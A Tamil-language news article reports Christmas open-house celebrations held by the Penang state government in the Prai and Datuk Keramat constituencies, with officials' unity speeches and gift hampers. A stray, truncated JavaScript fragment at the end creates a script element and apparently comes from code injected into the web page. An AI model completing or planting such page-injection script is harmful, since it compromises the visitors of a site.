பினாங்கு மாநிலத்தில் கிறிஸ்மஸ் கொண்டாட்டம்

டத்தோ கெராமாட் தொகுதியின் கிறிஸ்மஸ் கொண்டாட்டத்தில் பரிசுக்கூடைகளை வழங்கினார் ஆட்சிக்குழு உறுப்பினர் ஜெக்டிப் சிங் டியோ அவர்கள்.
டத்தோ கெராமாட் தொகுதியின் கிறிஸ்மஸ் கொண்டாட்டத்தில் பரிசுக்கூடைகளை வழங்கினார் ஆட்சிக்குழு உறுப்பினர் ஜெக்டிப் சிங் டியோ அவர்கள்.

பினாங்கு மாநிலத்தில் மக்கள் கூட்டணி அரசு ஏற்பாட்டில் பல சட்டமன்ற தொகுதிகளில் கிறிஸ்துமஸ் திறந்த இல்ல உபசரிப்பை நடத்தியது. பிறை தொகுதியின் சமூக முன்னேற்ற மற்றும் மேம்பாட்டுக் கழகமும் பிறை சட்டமன்றமும் இணைந்து கிறிஸ்மஸ் திறந்த இல்ல உபசரிப்பை ஏற்பாடுச் செய்திருந்தனர். நிகழ்வில் சிறப்புரையாற்றிய துணை முதல்வர் அவர்கள் அனைத்து இன மக்களும் ஒன்றுமையாக இருந்து இப்பண்டிகையை மேலும் மெருகூட்ட வேண்டும் என்று கேட்டுக் கொண்டார். அத்தினத்தன்று கலைநிகழ்ச்சியும் நம் நாட்டின் திறன்மிக்க கலைஞர்களின் படைப்புகளும் நிகழ்விற்குச் சிறப்பு சேர்த்தன. அங்கு பொதுமக்கள் புற்றீசல் போல் திரண்டனர். சுமார் 3000 பேருக்கு உணவு பண்டங்கள் வழங்கப்பட்டன. இதனிடையே, சிறுவர்களுக்கு மிகவும் பிடித்தமான பரிசுக்கூடை பிறை சட்டமன்ற உறுப்பினர் ப.இராமசாமி அவர்களின் பொற்கரத்தால் வழங்கினார்.

மாநில இரண்டாம் துணை முதல்வர் நிகழ்வில் கலந்து கொண்டார்
மாநில இரண்டாம் துணை முதல்வர் நிகழ்வில் கலந்து கொண்டார்ர

இதனிடையே, டத்தோ கெராமாட் தொகுதியின் கிறிஸ்மஸ் கொண்டாட்டம் தாமான் பிரி ஸ்கூல் வளாகத்தில் சிறப்பாக நடைபெற்றது. இந்நிகழ்வில் கிராமம், நகரம் மற்றும் வீடமைப்புத் திட்டமிடல் சேவைக்குழுவின் ஆட்சிக்குழு உறுப்பினர் மதிப்பிற்குரிய ஜெக்டிப் சிங் டியோ அவர்கள் தமது குடும்பத்தாருடன் கலந்து சிறப்பித்தார். நிகழ்வில் சிறப்புரையாற்றிய திரு.ஜெக்டிப் சிங் டியோ அவர்கள் அனைவருக்கும் தமது கிறிஸ்மஸ் வாழ்த்துகளை தெரிவித்துக் கொண்டார். அனைவரும் ஒன்றிணைந்து ஒருமனதோடு இத்திருநாளை கொண்டாடுவோம் என மேலும் கேட்டுக் கொண்டார். இந்நிகழ்வில் பல சிறப்பு அம்சங்கள் இடம்பெற்று வருகையாளர்களையும் பொதுமக்களையும் வெகுவாக கவர்ந்தன. பொதுமக்களுக்குப் பலவகையான தின்பண்டங்களும் அறுசுவை உணவுகளும் பரிமாறப்பட்டது பாராட்டக்குறியதாகும். பினாங்கு மாநில மக்கள் கூட்டணி அரசு அனைத்து இன மக்களின் ஒற்றுமைக்கும் வழிவகுக்கும் என்பது வெள்ளிடைமலையே.

var d=document;var s=d.createElement(‘script’);